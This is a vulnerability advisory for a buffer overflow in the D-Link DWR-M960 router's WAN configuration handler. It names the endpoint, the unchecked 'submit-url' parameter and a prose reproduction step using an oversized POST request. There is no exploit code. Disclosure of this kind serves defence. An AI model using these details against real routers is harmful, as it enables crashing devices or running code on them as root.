D-Link DWR-M960 Buffer Overflow Vulnerability in WAN Interface Setting Handler

A stack-based buffer overflow vulnerability has been identified in the D-Link DWR-M960 router, specifically in the WAN configuration handler. This vulnerability exists in the device's firmware version 1.01.07. The issue arises in the function 'sub_41914C' within the file '/boafrm/formWanConfigSetup'. The vulnerability is triggered by manipulating the 'submit-url' parameter, which is copied into a global buffer called 'wizard_htm' using the 'strcpy' function. The code fails to validate the length of the input, allowing for an overflow condition that can be exploited remotely.

Impact

Exploitation of this vulnerability leads to a stack-based buffer overflow, which can be used to overwrite critical memory areas. This could cause a denial-of-service condition by crashing the web server or rebooting the device. Additionally, there is potential for arbitrary code execution by crafting a payload that overwrites function pointers or control structures in memory, allowing execution of code with root privileges.

Reproduction

The vulnerability can be reproduced by sending a POST request to '/boafrm/formWanConfigSetup' with an oversized 'submit-url' parameter. The 'save_apply' parameter should also be included to trigger the save logic, although it is not strictly necessary.